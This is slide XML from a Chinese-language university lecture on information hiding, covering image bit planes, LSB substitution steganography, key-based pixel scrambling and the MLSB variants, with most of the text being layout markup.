              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean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pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为了确保隐藏内容的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</a:rPr>
              <a:t>机密性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，需要首先进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>加密处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，然后再隐藏。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220637942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课程内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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格式信息隐藏算法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时域算法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变换域算法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扩频算法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 smtClean="0"/>
              <a:t>统计算法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944997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图像信息隐藏技术分类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图像隐写算法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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>隐蔽性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图像鲁棒性水印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能够抵抗各种信号处理、攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>图像脆弱性水印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完整性验证、篡改定位</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175426019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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 时域替换技术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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>任何多媒体信息，在数字化时，都会产生物理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随机噪声</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，而人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>感官系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对这些随机噪声是不敏感的</a:t>
            </a:r>
          </a:p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替换技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>就是利用这个原理，试图用秘密信息比特替换掉随机噪声，以达到隐藏秘密信息的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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21387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图像的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>位平面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29701" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3124200"/>
            <a:ext cx="3314700" cy="2674938"/>
            <a:chOff x="2520" y="4560"/>
            <a:chExt cx="5220" cy="4212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29703" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="8304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4" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="306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Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="342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6" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="378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7" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="414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" name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="450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Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="594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Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="558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Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="522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Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4860" y="580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3" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="7992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Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="7680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Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="7368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19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="7056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20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="6744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Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="6432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Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="6120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Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="5808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1" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="7056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2" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="6744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Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="6432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4" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="612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5" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="5808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6" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="5496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7" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="5184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8" name="Line 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5940" y="4872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9" name="Line 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="594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0" name="Line 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6120" y="5652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1" name="Line 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6300" y="5496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2" name="Line 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6480" y="5340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3" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6660" y="5184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4" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6840" y="5028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5" name="Line 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="7020" y="4872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6" name="Line 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="7200" y="4716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Line 40"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="7380" y="4560"/>
              <a:ext cx="0" cy="24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Line 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="558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Line 42"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="522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Line 43"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="486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Line 44"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="450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Line 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="414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46"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="378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Line 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="342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Line 48"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3060" y="4560"/>
              <a:ext cx="144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6" name="Line 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3240" y="5652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Line 50"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3420" y="5496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Line 51"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="5340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9" name="Line 52"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3780" y="5184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0" name="Line 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="5028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1" name="Line 54"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4140" y="4872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2" name="Line 55"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4320" y="4716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3" name="Line 56"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4500" y="4560"/>
              <a:ext cx="2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4" name="Text Box 57"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3060" y="8304"/>
              <a:ext cx="360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just"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>1  2   3  4   5  6   7  8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29755" name="Text Box 58"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="5808"/>
              <a:ext cx="540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just"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>8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7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6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5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4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3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2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="16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9756" name="Text Box 59"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5940" y="8148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just"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="16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9757" name="Text Box 60"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7200" y="7056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just"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="6096000"/>
            <a:ext cx="33147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/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图4－1，图像象素的灰度表示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86981650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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术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图像各个位平面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作用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原始图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>灰度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图像）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30725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11960" r="46579" b="3987"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2819400"/>
            <a:ext cx="4876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01557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图像各个位平面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>去掉第一个位平面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Lena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图像和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>第一个位平面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12218" r="3326" b="4073"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3276600"/>
            <a:ext cx="73914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43612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图像各个位平面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>去掉第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个位平面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Lena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图像和第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个位平面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32773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11960" r="3326" b="3987"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3276600"/>
            <a:ext cx="7315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68554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Least Significant Bit)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图像的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低位权比特平面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，即，由像素较低有效位组成的平面，对视觉影响较小，可将其替换为秘密信息。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接收方提取相同的比特平面就可以获取秘密信息。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为增强安全性，收发双方也可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协商秘钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。发方使用密钥将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>像素位置置乱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后，再隐藏信息。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7784451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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>改进算法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除最低比特平面外，图像其它低比特平面也可隐藏信息。替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多个图像比特平面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐藏信息的算法，称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MLSB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Multiple Least Significant Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）算法。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把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>比特平面作为整体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，用秘密信息替换各个比特平面，这种算法称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IMLSB(Independent MLSB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>把各像素</a:t>
            </a:r>
            <a:r>
